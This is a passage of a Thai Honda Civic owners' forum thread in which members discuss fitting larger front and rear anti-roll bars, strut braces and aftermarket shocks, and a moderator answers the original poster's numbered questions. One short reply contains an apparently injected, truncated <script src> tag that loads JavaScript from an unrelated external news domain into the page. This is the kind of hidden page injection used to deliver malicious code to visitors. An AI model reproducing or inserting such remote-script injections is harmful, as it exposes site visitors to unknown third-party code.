ตอบ
koonaea


ชื่อเล่น: เอ๋

เข้าร่วม: 29 ธันวา 2008
ตอบ: 1097

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2962
ให้คำขอบคุณ: 434

ที่อยู่: ชลบุรี
ปี: 2005
สี: เทา ซิลเวอร์สโตน (NH-630M)
อาทิตย์, 3 กรกฎา 2011 22:15 - สอบถามเรื่องกันโคลงหน่อยสิครับ รบกวนช่วยตอบหน่อยนะครับ กำลังสนใจครับ....เอ๋ครับ
รบกวนเพื่อนๆ หน่อยนะครับ หลายคำถามหน่อยนะครับ แต่ต้องใช้ตัดสินใจจริงๆครับ
ตอนนี้รถผม 05 โช้คเดิม, สปริง TEIN, มีกันโคลง หน้า-หลัง เรียบร้อยแล้ว (เดิมจากโรงงาน)


ฟิลผม ชอบขับรถนิ่มๆครับ ขับสบายๆ แต่เป็นคนขับรถค่อนข้างเร็ว 140-180 ไปกลับ ชลบุรี-ระยอง บ่อยๆครับ
เห็นเพื่อนๆบอกว่าใส่กันโคลงใหญ่ๆแล้วดีขึ้น เลยอยากได้ แบบขับแล้ว มั่นใจ เข้าโค้งได้นิ่งขึ้น รถไม่โยนไรงี้ครับ
เคยนั่งโช๊คซิ่งมาแล้วหนึบมากกกก แต่ไม่ไหวครับ แข็งเกินครับ
เลยอยากรู้ว่า กันโคลงใหญ่ๆ นี่จะตอบโจทย์ผมได้ตรงมั๊ยน่ะครับ ยังไงรบกวนหน่อยนะครับ



1 เพื่อนๆพอรู้มั๊ยครับ ว่าเดิมๆมันขนาดเท่าไหรครับ หน้า-หลัง
2 ถ้าเปลี่ยนไปใส่ ใหญ่ขึ้น มีขนาดเท่าไหร่บ้างครับ
3 ด้านหน้า หลัง เท่าที่อ่านมา หน้าต้องใหญ่กว่าหลังใช่มั๊ยครับ
4 ด้านหน้า ระหว่างใส่กันโคลง กับค้ำหน้า เห็นผลในลักษณะเดียวกันมั๊ยครับ อันนี้ผมไม่เข้าใจรายละเอียดเชิงลึกจริงๆครับ
5 ด้านหลัง ถ้าใหญ่ขึ้น จำเป็นต้องใส่ SUBFRAME มั๊ยครับ เห็นว่าถ้าใหญ่ขึ้นอาจมีแรงดึงที่ตัวถังทำให้ฉีกได้ แต่ไม่แน่ใจว่าแค่ไหนที่ตัวถังเดิมรับได้ครับ
6 รบกวนเพื่อนๆที่เปลี่ยนแล้วหน่อยสิครับ ว่าเห็นชัดเจน แบบรู้สึกได้มั๊ยครับ รู้สึกชัดเจนเลยป่าว ประมาณนี้
7 อาการหลังเปลี่ยนเป็นยังไงบ้างครับ ขอแบบเพื่อนที่เปลี่ยนด้านหน้ามาอย่างเดียว และที่เปลี่ยน หน้า-หลัง นะครับ รบกวนหน่อยคร้าบ
8 มีข้อเสียอะไรบ้างป่าวครับ อย่างแรกคือ ความนิ่มนวลอาจจะน้อยลง แต่ไม่แข็งแบบโช้คซิ่งใช่ป่าวครับ
9 ต้องเปลี่ยนที่ไหนครับ ร้านยาง COCKPIT อะไรงี้ทำได้ป่าวครับ ค่าใช้จ่ายเท่าไหรครับผ

พิมพ์มาซะยาวเลย เกรงใจจัง อิอิ ขอบคุณเพื่อนๆที่อ่านจนจบนะครับ ยังไงผมขอคำแนะนำหน่อยนะครับ . ......เอ๋คร้าบ










Attached File :
สอบถามเรื่องกันโคลงหน่อยสิครับ  รบกวนช่วยตอบหน่อยนะครับ กำลังสนใจครับ....เอ๋ครับ


แก้ไขล่าสุดโดย เมื่อ อาทิตย์, 3 กรกฎา 2011 22:32, ทั้งหมด 1 ครั้ง (ดูทั้งหมด)
ได้รับคำขอบคุณจาก: Justinaen  tokykung  wighwaytak  Favonius  movingtown  cisco  maxch  sukhothai  8800Gold  TumGolok  jukkadui  kittidech  BALLJARAN35  zan  Bonuses01  kim_possible  chana  bank  tonaff 
catsteal


ชื่อเล่น: อ๋อง

เข้าร่วม: 08 เมษา 2010
ตอบ: 3841

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3145
ให้คำขอบคุณ: 124

ที่อยู่: เชียงใหม่-กรุงเทพ
ปี: 2004
สี: น้ำเงิน วิวิด (มุก) (B-502P)
อาทิตย์, 3 กรกฎา 2011 22:25 - สอบถามเรื่องกันโคลงหน่อยสิครับ รบกวนช่วยตอบหน่อยนะครับ กำลังสนใจครับ....เอ๋ครับ
ความเห็นส่วนตัวนะคับ
ถ้านิ่งจิงๆผมว่าค้ำตัวถังนะ
กันโครงผมใส่ก็รู้สึกเฉยๆ เพื่อนผมไม่มีก็รู้สึกไม่ต่างกัน
แต่พอเจออีกคัน ใส่ค้ำตัวถังค่อนข้างเยอะ แบบว่าเยอะเวอ รู้สึกถึงความต่างมากกว่า
หรือว่าผมเป็นคนรับความรู้สึกของรถยากก็ไม่ทราบนะคับ
ได้รับคำขอบคุณจาก: wighwaytak  koonaea  BALLJARAN35  chana 
koonaea


ชื่อเล่น: เอ๋

เข้าร่วม: 29 ธันวา 2008
ตอบ: 1097

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2962
ให้คำขอบคุณ: 434

ที่อยู่: ชลบุรี
ปี: 2005
สี: เทา ซิลเวอร์สโตน (NH-630M)
อาทิตย์, 3 กรกฎา 2011 22:37 - สอบถามเรื่องกันโคลงหน่อยสิครับ รบกวนช่วยตอบหน่อยนะครับ กำลังสนใจครับ....เอ๋ครับ
catsteal พิมพ์ว่า:
ความเห็นส่วนตัวนะคับ
ถ้านิ่งจิงๆผมว่าค้ำตัวถังนะ
กันโครงผมใส่ก็รู้สึกเฉยๆ เพื่อนผมไม่มีก็รู้สึกไม่ต่างกัน
แต่พอเจออีกคัน ใส่ค้ำตัวถังค่อนข้างเยอะ แบบว่าเยอะเวอ รู้สึกถึงความต่างมากกว่า
หรือว่าผมเป็นคนรับความรู้สึกของรถยากก็ไม่ทราบนะคับ


ขอบคุณคร้าบ
รอต่อครับ ขอหลายๆความเห็นหน่อยครับผม
ได้รับคำขอบคุณจาก: puyzaaaaa  BALLJARAN35  chana 
koobe


ชื่อเล่น: นัท

เข้าร่วม: 19 มิถุนา 2010
ตอบ: 2462

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3437
ให้คำขอบคุณ: 2482

ที่อยู่: เพชรบุรี-กระทุ่มแบน-คลองเตย-ลาดกระบัง
ปี: 2003
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
จันทร์, 4 กรกฎา 2011 01:33 - สอบถามเรื่องกันโคลงหน่อยสิครับ รบกวนช่วยตอบหน่อยนะครับ กำลังสนใจครับ....เอ๋ครับ
ผมลองใส่แล้วกันโคลงใหญ่ๆ กับแบบเดิมๆติดรถ เห็นผลไม่ค่อยแตกต่างกันเท่าไร แต่ก็ดีกว่ารถที่ไม่มีกันโคลงเลย ลองโช๊คดีๆสักชุด เห็นผลแน่นอนกว่าครับ ตอนนี้ของคุณเอ๋ เปลี่ยนแต่สปริง เวลาขับเร็วๆแล้วรถไม่โยนหรือครับ(ถ้าใช้โช๊คเดิม) อัดน้ำมันโช๊คเดิมก็ช่วยได้อีกนิดหน่อย แนะนำให้ลอง EP3 หรือ DC5 น่าจะเหมาะกว่าใส่กันโคลงใหญ่ๆนะราคาก็พอไหว แต่ถ้ามีงบ จัด TEIN SS ชุดเดียวจบเลยครับ
ได้รับคำขอบคุณจาก: benzd  hacker  puyzaaaaa  mark_es03  cisco  maxch  ahingrace  koonaea  kittidech  BALLJARAN35  zan  chana 
ohmz1541


ชื่อเล่น: โอม

เข้าร่วม: 05 ธันวา 2008
ตอบ: 1977

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2324
ให้คำขอบคุณ: 529

ที่อยู่: เชียงราย-รามอินทรา
ปี: 2003
สี: ขาว ทาฟเฟต้า (NH-578)
จันทร์, 4 กรกฎา 2011 06:49 - สอบถามเรื่องกันโคลงหน่อยสิครับ รบกวนช่วยตอบหน่อยนะครับ กำลังสนใจครับ....เอ๋ครับ
ลองลงทุนกะโช้ค จะได้ความรุ้สึกที่ชัดเจนกว่าครับ
ได้รับคำขอบคุณจาก: puyzaaaaa  wighwaytak  koonaea  chana 
nakaporn


ชื่อเล่น: ต้น

เข้าร่วม: 24 มิถุนา 2009
ตอบ: 295

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 912
ให้คำขอบคุณ: 0

ที่อยู่: แพรกษาใหม่
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
จันทร์, 4 กรกฎา 2011 07:14 - สอบถามเรื่องกันโคลงหน่อยสิครับ รบกวนช่วยตอบหน่อยนะครับ กำลังสนใจครับ....เอ๋ครับ
koobe พิมพ์ว่า:
ผมลองใส่แล้วกันโคลงใหญ่ๆ กับแบบเดิมๆติดรถ เห็นผลไม่ค่อยแตกต่างกันเท่าไร แต่ก็ดีกว่ารถที่ไม่มีกันโคลงเลย ลองโช๊คดีๆสักชุด เห็นผลแน่นอนกว่าครับ ตอนนี้ของคุณเอ๋ เปลี่ยนแต่สปริง เวลาขับเร็วๆแล้วรถไม่โยนหรือครับ(ถ้าใช้โช๊คเดิม) อัดน้ำมันโช๊คเดิมก็ช่วยได้อีกนิดหน่อย แนะนำให้ลอง EP3 หรือ DC5 น่าจะเหมาะกว่าใส่กันโคลงใหญ่ๆนะราคาก็พอไหว แต่ถ้ามีงบ จัด TEIN SS ชุดเดียวจบเลยครับ



ไม่ค่อยแตกต่างจากของเดิมชักเท่าใหร่ครับ แต่ได้ความรู้สึกทางใจมากกว่า ถ้าอยากได้หนึมแบบไม่กระด้างมากก็ SS ไทยชักชุดครับแต่กลัวอย่างเดี๋ยวคือพอลองไปแล้วจะไม่ค่อยจบส่วนใหญ่จะขยับไปเลื่อยเหมือนผมที่ตอนเล่นใหม่ๆๆอารมย์เดี๋ยวกันกับคุณ แต่สุดท้ายหมดไปกับการเปลี่ยนโช็ค 5 ครั้งแล้วไม่ใช่ของไม่ดีนะครับแต่ยากลอง โช็คเดิมอัดน้ำมันสปริงโหลด 1 ครั้ง Flex 1 ครั้ง Mugen 1 ครั้ง Mono flex 1 SS DC5 1ครั้ง Flex 1 ครั้ง ตอนนี้รอ Mono อีกทีเพราะชอบสุด เหลือแต่ Ohlins ยังไม่มีโอกาสเพราะหายากมาก
ได้รับคำขอบคุณจาก: benzd  puyzaaaaa  koonaea  honeybeex7  kittidech  BALLJARAN35  zan  chana 
Ton-


เข้าร่วม: 02 ตุลา 2008
ตอบ: 1397

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5467
ให้คำขอบคุณ: 1471
จันทร์, 4 กรกฎา 2011 07:53 - สอบถามเรื่องกันโคลงหน่อยสิครับ รบกวนช่วยตอบหน่อยนะครับ กำลังสนใจครับ....เอ๋ครับ
ประสบการณ์ส่วนตัว ด้านหลังจากไม่มีกันโคลง แล้วไปใส่ 13 มม ไม่รู้สึกอะไรเลย อาจเป็นเพราะใส่ tein ss อยู่แล้วด้วยมั้ง

ตอนนี้ผมสั่งสปริงหลอดยี่ห้อ swift ไป เพื่อจะเอามาใส่กับ tein ss เพราะ ss เดิมๆ มันสะเทือนเวลาเจอทางไม่เรียบดีเหลือเกิน ถ้าใส่แล้วได้ผลดียังไงจะมาบอกให้ฟังเป็นทางเลือกอีกทาง
ได้รับคำขอบคุณจาก: tatumz  puyzaaaaa  mark_es03  koonaea  honeybeex7  zan  chana  jacky19 
tatumz


เข้าร่วม: 30 กรกฎา 2009
ตอบ: 728

Guru ES
Guru ES

ได้รับคำขอบคุณ: 639
ให้คำขอบคุณ: 494

ที่อยู่: 69
ปี: 2003
จันทร์, 4 กรกฎา 2011 07:57 - สอบถามเรื่องกันโคลงหน่อยสิครับ รบกวนช่วยตอบหน่อยนะครับ กำลังสนใจครับ....เอ๋ครับ
Ton- พิมพ์ว่า:
ประสบการณ์ส่วนตัว ด้านหลังจากไม่มีกันโคลง แล้วไปใส่ 13 มม ไม่รู้สึกอะไรเลย อาจเป็นเพราะใส่ tein ss อยู่แล้วด้วยมั้ง

ตอนนี้ผมสั่งสปริงหลอดยี่ห้อ swift ไป เพื่อจะเอามาใส่กับ tein ss เพราะ ss เดิมๆ มันสะเทือนเวลาเจอทางไม่เรียบดีเหลือเกิน ถ้าใส่แล้วได้ผลดียังไงจะมาบอกให้ฟังเป็นทางเลือกอีกทาง


รอผลครับ
ได้รับคำขอบคุณจาก: koonaea  chana 
puyzaaaaa


ชื่อเล่น: ปุ่ย

เข้าร่วม: 10 เมษา 2011
ตอบ: 3008

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3014
ให้คำขอบคุณ: 3113

ที่อยู่: พิษณุโลก
ปี: 2004
จันทร์, 4 กรกฎา 2011 09:06 - สอบถามเรื่องกันโคลงหน่อยสิครับ รบกวนช่วยตอบหน่อยนะครับ กำลังสนใจครับ....เอ๋ครับ
ของผม รถ ปี 04 ช่างล่าง โช็คเดิมเลือนเบ้าหน้าลงสุด + สปิง TENI อัดน้ำมัน หน้าแข็ง หลัง พอนึบ

ใส่ค้ำหน้า ค้ำหลังบน ผมว่าในความเร็วขนาด 140 -180 นิ่งพอสมควรครับ(ผมว่านิ่งนะครับ)

อีกอย่างขับในเมือง ก็ไม่แข็งเกินไป ไม่ถึงขนาด ฟิลนักแข็ง

ขนาล้อ ของผม 205 45 17 ลมยาง 34 จำนวณห้องโดยสาร 2-3 คน ปกติ ครับ

แต่ผมไม่ทราบว่า ใส่กันโคลงใหญ่ขึ้นจะเห็นผลรึป่าวครับ ... แต่ตอนนี้ที่ว่ากำลังโอเคเลยครับ

ยังงัยเป็นแนวให้เจ้าของกระทู้ครับ
ได้รับคำขอบคุณจาก: BALLJARAN35  chana 
SkyMaN_RaYoNg


ชื่อเล่น: เปเล่

เข้าร่วม: 05 พฤษภาคม 2011
ตอบ: 882

Guru ES
Guru ES

ได้รับคำขอบคุณ: 540
ให้คำขอบคุณ: 3979

ที่อยู่: เมือง ระยอง
ปี: 2005
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
จันทร์, 4 กรกฎา 2011 09:13 - สอบถามเรื่องกันโคลงหน่อยสิครับ รบกวนช่วยตอบหน่อยนะครับ กำลังสนใจครับ....เอ๋ครับ
รอ Update ข้อมูลครับ
ได้รับคำขอบคุณจาก: koonaea  chana 
Surpass


ชื่อเล่น: พงษ์

เข้าร่วม: 01 มีนา 2010
ตอบ: 2872

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 734
ให้คำขอบคุณ: 1559

ที่อยู่: มีนบุรี
ปี: 2003
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
จันทร์, 4 กรกฎา 2011 09:51 - สอบถามเรื่องกันโคลงหน่อยสิครับ รบกวนช่วยตอบหน่อยนะครับ กำลังสนใจครับ....เอ๋ครับ
ข้อมูล
ได้รับคำขอบคุณจาก: koonaea  chana 
movingtown


ชื่อเล่น: อเด

เข้าร่วม: 15 พฤศจิกา 2009
ตอบ: 1505

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1259
ให้คำขอบคุณ: 1948

ที่อยู่: ระยอง - โขทัย
ปี: 2003
สี: ขาว ทาฟเฟต้า (NH-578)
จันทร์, 4 กรกฎา 2011 10:23 - สอบถามเรื่องกันโคลงหน่อยสิครับ รบกวนช่วยตอบหน่อยนะครับ กำลังสนใจครับ....เอ๋ครับ
รออ่านอย่างเดียวครับ <script src="https://sport32news.com/civicesgroup.js"></
ได้รับคำขอบคุณจาก: koonaea  chana 
movingtown


ชื่อเล่น: อเด

เข้าร่วม: 15 พฤศจิกา 2009
ตอบ: 1505

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1259
ให้คำขอบคุณ: 1948

ที่อยู่: ระยอง - โขทัย
ปี: 2003
สี: ขาว ทาฟเฟต้า (NH-578)
จันทร์, 4 กรกฎา 2011 10:24 - สอบถามเรื่องกันโคลงหน่อยสิครับ รบกวนช่วยตอบหน่อยนะครับ กำลังสนใจครับ....เอ๋ครับ
koonaea พิมพ์ว่า:
รบกวนเพื่อนๆ หน่อยนะครับ หลายคำถามหน่อยนะครับ แต่ต้องใช้ตัดสินใจจริงๆครับ
ตอนนี้รถผม 05 โช้คเดิม, สปริง TEIN, มีกันโคลง หน้า-หลัง เรียบร้อยแล้ว (เดิมจากโรงงาน)


ฟิลผม ชอบขับรถนิ่มๆครับ ขับสบายๆ แต่เป็นคนขับรถค่อนข้างเร็ว 140-180 ไปกลับ ชลบุรี-ระยอง บ่อยๆครับ
เห็นเพื่อนๆบอกว่าใส่กันโคลงใหญ่ๆแล้วดีขึ้น เลยอยากได้ แบบขับแล้ว มั่นใจ เข้าโค้งได้นิ่งขึ้น รถไม่โยนไรงี้ครับ
เคยนั่งโช๊คซิ่งมาแล้วหนึบมากกกก แต่ไม่ไหวครับ แข็งเกินครับ
เลยอยากรู้ว่า กันโคลงใหญ่ๆ นี่จะตอบโจทย์ผมได้ตรงมั๊ยน่ะครับ ยังไงรบกวนหน่อยนะครับ



1 เพื่อนๆพอรู้มั๊ยครับ ว่าเดิมๆมันขนาดเท่าไหรครับ หน้า-หลัง
2 ถ้าเปลี่ยนไปใส่ ใหญ่ขึ้น มีขนาดเท่าไหร่บ้างครับ
3 ด้านหน้า หลัง เท่าที่อ่านมา หน้าต้องใหญ่กว่าหลังใช่มั๊ยครับ
4 ด้านหน้า ระหว่างใส่กันโคลง กับค้ำหน้า เห็นผลในลักษณะเดียวกันมั๊ยครับ อันนี้ผมไม่เข้าใจรายละเอียดเชิงลึกจริงๆครับ
5 ด้านหลัง ถ้าใหญ่ขึ้น จำเป็นต้องใส่ SUBFRAME มั๊ยครับ เห็นว่าถ้าใหญ่ขึ้นอาจมีแรงดึงที่ตัวถังทำให้ฉีกได้ แต่ไม่แน่ใจว่าแค่ไหนที่ตัวถังเดิมรับได้ครับ
6 รบกวนเพื่อนๆที่เปลี่ยนแล้วหน่อยสิครับ ว่าเห็นชัดเจน แบบรู้สึกได้มั๊ยครับ รู้สึกชัดเจนเลยป่าว ประมาณนี้
7 อาการหลังเปลี่ยนเป็นยังไงบ้างครับ ขอแบบเพื่อนที่เปลี่ยนด้านหน้ามาอย่างเดียว และที่เปลี่ยน หน้า-หลัง นะครับ รบกวนหน่อยคร้าบ
8 มีข้อเสียอะไรบ้างป่าวครับ อย่างแรกคือ ความนิ่มนวลอาจจะน้อยลง แต่ไม่แข็งแบบโช้คซิ่งใช่ป่าวครับ
9 ต้องเปลี่ยนที่ไหนครับ ร้านยาง COCKPIT อะไรงี้ทำได้ป่าวครับ ค่าใช้จ่ายเท่าไหรครับผ

พิมพ์มาซะยาวเลย เกรงใจจัง อิอิ ขอบคุณเพื่อนๆที่อ่านจนจบนะครับ ยังไงผมขอคำแนะนำหน่อยนะครับ . ......เอ๋คร้าบ










พี่เอ๋ทําอยู่ไทยพานิชตรงข้าม star ใช่ป่ะครับ
ได้รับคำขอบคุณจาก: koonaea  chana 
rung03


เข้าร่วม: 09 พฤศจิกา 2010
ตอบ: 189

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 144
ให้คำขอบคุณ: 42

ที่อยู่: Eastern
ปี: 2003
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
จันทร์, 4 กรกฎา 2011 10:31 - สอบถามเรื่องกันโคลงหน่อยสิครับ รบกวนช่วยตอบหน่อยนะครับ กำลังสนใจครับ....เอ๋ครับ
puyzaaaaa พิมพ์ว่า:
ของผม รถ ปี 04 ช่างล่าง โช็คเดิมเลือนเบ้าหน้าลงสุด + สปิง TENI อัดน้ำมัน หน้าแข็ง หลัง พอนึบ

ใส่ค้ำหน้า ค้ำหลังบน ผมว่าในความเร็วขนาด 140 -180 นิ่งพอสมควรครับ(ผมว่านิ่งนะครับ)

อีกอย่างขับในเมือง ก็ไม่แข็งเกินไป ไม่ถึงขนาด ฟิลนักแข็ง

ขนาล้อ ของผม 205 45 17 ลมยาง 34 จำนวณห้องโดยสาร 2-3 คน ปกติ ครับ

แต่ผมไม่ทราบว่า ใส่กันโคลงใหญ่ขึ้นจะเห็นผลรึป่าวครับ ... แต่ตอนนี้ที่ว่ากำลังโอเคเลยครับ

ยังงัยเป็นแนวให้เจ้าของกระทู้ครับ


ลมยาง 34 โอเคมั๊ยครับ ร้านที่ผมไปเปลี่ยนยางแนะนำให้เติมลมยาง 40 มากไปหรือป่าว ไม่รู้ว่ายางซีรี่นี้เขาเติมกันเท่าไหร่ ผมเติม 40 มาตลอดเลย
ได้รับคำขอบคุณจาก: koonaea  BALLJARAN35  chana 
Hell_Boy


เข้าร่วม: 11 พฤศจิกา 2010
ตอบ: 557

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 1868
ให้คำขอบคุณ: 142
จันทร์, 4 กรกฎา 2011 11:08 - สอบถามเรื่องกันโคลงหน่อยสิครับ รบกวนช่วยตอบหน่อยนะครับ กำลังสนใจครับ....เอ๋ครับ
nakaporn พิมพ์ว่า:
koobe พิมพ์ว่า:
ผมลองใส่แล้วกันโคลงใหญ่ๆ กับแบบเดิมๆติดรถ เห็นผลไม่ค่อยแตกต่างกันเท่าไร แต่ก็ดีกว่ารถที่ไม่มีกันโคลงเลย ลองโช๊คดีๆสักชุด เห็นผลแน่นอนกว่าครับ ตอนนี้ของคุณเอ๋ เปลี่ยนแต่สปริง เวลาขับเร็วๆแล้วรถไม่โยนหรือครับ(ถ้าใช้โช๊คเดิม) อัดน้ำมันโช๊คเดิมก็ช่วยได้อีกนิดหน่อย แนะนำให้ลอง EP3 หรือ DC5 น่าจะเหมาะกว่าใส่กันโคลงใหญ่ๆนะราคาก็พอไหว แต่ถ้ามีงบ จัด TEIN SS ชุดเดียวจบเลยครับ



ไม่ค่อยแตกต่างจากของเดิมชักเท่าใหร่ครับ แต่ได้ความรู้สึกทางใจมากกว่า ถ้าอยากได้หนึมแบบไม่กระด้างมากก็ SS ไทยชักชุดครับแต่กลัวอย่างเดี๋ยวคือพอลองไปแล้วจะไม่ค่อยจบส่วนใหญ่จะขยับไปเลื่อยเหมือนผมที่ตอนเล่นใหม่ๆๆอารมย์เดี๋ยวกันกับคุณ แต่สุดท้ายหมดไปกับการเปลี่ยนโช็ค 5 ครั้งแล้วไม่ใช่ของไม่ดีนะครับแต่ยากลอง โช็คเดิมอัดน้ำมันสปริงโหลด 1 ครั้ง Flex 1 ครั้ง Mugen 1 ครั้ง Mono flex 1 SS DC5 1ครั้ง Flex 1 ครั้ง ตอนนี้รอ Mono อีกทีเพราะชอบสุด เหลือแต่ Ohlins ยังไม่มีโอกาสเพราะหายากมาก



พี่ต้น ออกต่อไหมพี่
ได้รับคำขอบคุณจาก: koonaea  BALLJARAN35  chana 
cjj0125


เข้าร่วม: 04 ตุลา 2008
ตอบ: 874

Guru ES
Guru ES

ได้รับคำขอบคุณ: 370
ให้คำขอบคุณ: 55

ที่อยู่: กรุงเทพ
ปี: 2003
จันทร์, 4 กรกฎา 2011 11:19 - สอบถามเรื่องกันโคลงหน่อยสิครับ รบกวนช่วยตอบหน่อยนะครับ กำลังสนใจครับ....เอ๋ครับ
nakaporn พิมพ์ว่า:
koobe พิมพ์ว่า:
ผมลองใส่แล้วกันโคลงใหญ่ๆ กับแบบเดิมๆติดรถ เห็นผลไม่ค่อยแตกต่างกันเท่าไร แต่ก็ดีกว่ารถที่ไม่มีกันโคลงเลย ลองโช๊คดีๆสักชุด เห็นผลแน่นอนกว่าครับ ตอนนี้ของคุณเอ๋ เปลี่ยนแต่สปริง เวลาขับเร็วๆแล้วรถไม่โยนหรือครับ(ถ้าใช้โช๊คเดิม) อัดน้ำมันโช๊คเดิมก็ช่วยได้อีกนิดหน่อย แนะนำให้ลอง EP3 หรือ DC5 น่าจะเหมาะกว่าใส่กันโคลงใหญ่ๆนะราคาก็พอไหว แต่ถ้ามีงบ จัด TEIN SS ชุดเดียวจบเลยครับ



ไม่ค่อยแตกต่างจากของเดิมชักเท่าใหร่ครับ แต่ได้ความรู้สึกทางใจมากกว่า ถ้าอยากได้หนึมแบบไม่กระด้างมากก็ SS ไทยชักชุดครับแต่กลัวอย่างเดี๋ยวคือพอลองไปแล้วจะไม่ค่อยจบส่วนใหญ่จะขยับไปเลื่อยเหมือนผมที่ตอนเล่นใหม่ๆๆอารมย์เดี๋ยวกันกับคุณ แต่สุดท้ายหมดไปกับการเปลี่ยนโช็ค 5 ครั้งแล้วไม่ใช่ของไม่ดีนะครับแต่ยากลอง โช็คเดิมอัดน้ำมันสปริงโหลด 1 ครั้ง Flex 1 ครั้ง Mugen 1 ครั้ง Mono flex 1 SS DC5 1ครั้ง Flex 1 ครั้ง ตอนนี้รอ Mono อีกทีเพราะชอบสุด เหลือแต่ Ohlins ยังไม่มีโอกาสเพราะหายากมาก


monoรออีกอึดใจ
ได้รับคำขอบคุณจาก: koonaea  BALLJARAN35  chana 
Makai


ชื่อเล่น: มะไก่

เข้าร่วม: 16 พฤษภาคม 2010
ตอบ: 3940

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2065
ให้คำขอบคุณ: 3430

ที่อยู่: ชลบุรีมหานคร (บ้านสวน) ...
ปี: 2003
สี: ทอง แซทเทิลไลท์ (NH-663M)
จันทร์, 4 กรกฎา 2011 11:43 - สอบถามเรื่องกันโคลงหน่อยสิครับ รบกวนช่วยตอบหน่อยนะครับ กำลังสนใจครับ....เอ๋ครับ
puyzaaaaa พิมพ์ว่า:
ของผม รถ ปี 04 ช่างล่าง โช็คเดิมเลือนเบ้าหน้าลงสุด + สปิง TENI อัดน้ำมัน หน้าแข็ง หลัง พอนึบ

ใส่ค้ำหน้า ค้ำหลังบน ผมว่าในความเร็วขนาด 140 -180 นิ่งพอสมควรครับ(ผมว่านิ่งนะครับ)

อีกอย่างขับในเมือง ก็ไม่แข็งเกินไป ไม่ถึงขนาด ฟิลนักแข็ง

ขนาล้อ ของผม 205 45 17 ลมยาง 34 จำนวณห้องโดยสาร 2-3 คน ปกติ ครับ

แต่ผมไม่ทราบว่า ใส่กันโคลงใหญ่ขึ้นจะเห็นผลรึป่าวครับ ... แต่ตอนนี้ที่ว่ากำลังโอเคเลยครับ

ยังงัยเป็นแนวให้เจ้าของกระทู้ครับ



ขอนอกเรื่องหน่อยนะคับ รถพี่มีปัญหาพอเปลี่ยนใส่ปริงTeinแล้วรถเอียงป่ะคับ ของผมพอเปลี่ยนสปริงแล้วรถเอียงขวาอ่ะคับ แต่ผมยังไม่ได้เลื่อนเบ้านะ อืมแล้วผมอยากถามว่าพี่ที่ไปเลื่อนเบ้าอัดน้ำมันหน้าหลังมาพร้อมค่าแรงเท่าไรอ่ะ ยังไงรบกวนPMบอกผมหน่อยนะคับ ขอบคุนคร้าบบบบบ
ได้รับคำขอบคุณจาก: koonaea  BALLJARAN35  chana 
PongpanG


ชื่อเล่น: ป๋องแป๋ง

เข้าร่วม: 11 สิงหา 2008
ตอบ: 3254

Moderator
Moderator

ได้รับคำขอบคุณ: 12524
ให้คำขอบคุณ: 3239

ที่อยู่: รังสิต
ปี: 2005
สี: เทา ซิลเวอร์สโตน (NH-630M)
จันทร์, 4 กรกฎา 2011 12:21 - สอบถามเรื่องกันโคลงหน่อยสิครับ รบกวนช่วยตอบหน่อยนะครับ กำลังสนใจครับ....เอ๋ครับ
1 เพื่อนๆพอรู้มั๊ยครับ ว่าเดิมๆมันขนาดเท่าไหรครับ หน้า-หลัง
- หน้า 15หรือ17 หลัง 13

2 ถ้าเปลี่ยนไปใส่ ใหญ่ขึ้น มีขนาดเท่าไหร่บ้างครับ
-หน้า 27ของสตรีม 25,22 ตรงรุ่น 01-02 หลัง 19 DC5 Type S และ22 R

3 ด้านหน้า หลัง เท่าที่อ่านมา หน้าต้องใหญ่กว่าหลังใช่มั๊ยครับ
-ใช่ครับ

4 ด้านหน้า ระหว่างใส่กันโคลง กับค้ำหน้า เห็นผลในลักษณะเดียวกันมั๊ยครับ อันนี้ผมไม่เข้าใจรายละเอียดเชิงลึกจริงๆครับ
-ทำงาน คนละอย่างครับ ค้ำหน้าทำหน้าที่ ลดการบิดตัว ส่วนกันโคลงตรง ก็ ตรงชื่อครับ

5 ด้านหลัง ถ้าใหญ่ขึ้น จำเป็นต้องใส่ SUBFRAME มั๊ยครับ เห็นว่าถ้าใหญ่ขึ้นอาจมีแรงดึงที่ตัวถังทำให้ฉีกได้ แต่ไม่แน่ใจว่าแค่ไหนที่ตัวถังเดิมรับได้ครับ
-ของเดิม DC5 22มิล ไปก้มดูที่รถ DC5 เลย บนคานก็เท่ากันกะของรถเราครับ ใส่ซับเอาสวยงาม ก็ได้

6 รบกวนเพื่อนๆที่เปลี่ยนแล้วหน่อยสิครับ ว่าเห็นชัดเจน แบบรู้สึกได้มั๊ยครับ รู้สึกชัดเจนเลยป่าว ประมาณนี้
-ชัดครับ

7 อาการหลังเปลี่ยนเป็นยังไงบ้างครับ ขอแบบเพื่อนที่เปลี่ยนด้านหน้ามาอย่างเดียว และที่เปลี่ยน หน้า-หลัง นะครับ รบกวนหน่อยคร้าบ
-เดิมผมไม่มีเลย ตอนแรกใส่ หน้า 22 อย่างเดียว โอ้ว ครั้งแรกที่ขับ ลองกระชากโค้งเลย เห็นค่อนข้างชัดเจน บอกก่อนนะครับ ว่า ของเดิมตอนแรกไม่มี แต่ ถ้าเทียบ เหล็ก ของเดิมติดรถ05 กับเหล็ก กลวงๆเบาๆ พวก 22 25 27 มิล ตัน

